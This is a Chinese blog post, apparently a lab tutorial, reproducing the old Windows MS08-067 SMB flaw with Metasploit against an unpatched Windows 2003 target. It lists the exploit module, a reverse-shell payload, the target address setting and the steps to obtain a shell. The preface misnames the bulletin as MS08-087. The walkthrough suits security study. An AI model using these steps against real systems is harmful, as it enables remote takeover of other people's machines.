前言
本次介绍Windows系统漏洞 MS08-087
一、MS08-067 介绍
Windows Server服务 RPC 缓冲区远程溢出漏洞
编号 MS08-067
二、漏洞复现
1.漏洞原理
MS08_067漏洞渗透攻击原理
其原理就是攻击者利用受害者默认开启的SMB服务端口445端口发送恶意的资料到这个端口,通过MSRPC接口调用Server服务的函数,并破坏程序的栈缓冲区,利用远程代码执行权限,从而控制主机
2.漏洞复现
前期准备: 靶机:Windows 2003 (未打补丁)
攻击机:kali Linux
MS08_067漏洞渗透攻击过程
使用Metasploit中对应的模块进行渗透攻击。
启动Metasploit,进入之后搜索对于漏洞模块
Search ms08-067
搜索到ms08-067 对于的漏洞模块,渗透模块又四部分组成 分别代表模块类型 目标平台 目标服务 模块名称 组成
2. 使用这个模块
Use exploit/windows/smb/ms08_067_netapi
3.查看所需条件
Show options
需要设置靶机的ip地址 攻击载荷 靶机的系统平台版本
4. 设置攻击载荷
攻击载荷就是payload 就是常见的shelllode
首先查找payload
Show payload
找到所需的payload
generic/shell_reverse_tcp
使用这个payload
Set payload generic/shell_reverse_tcp
5. 设置靶机的主机版本
Show targets
在前期对靶机的探测当中获得的主机版本消息,找到合适的版本信息
Automatic Targeting 选择这个系统会自动选择合适的版本攻击
6.设置IP地址等信息
Set rhost 10.10.10.130
7.运行
Run
8.得到shell
输入shell 进入shell交互式
总结
今天介绍了 Windows经典漏洞 MS08-067 漏洞攻击原理和复现过程
————————————————
版权声明:本文为CSDN博主「爱学网安的萌新」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_60888404/article/details/125112307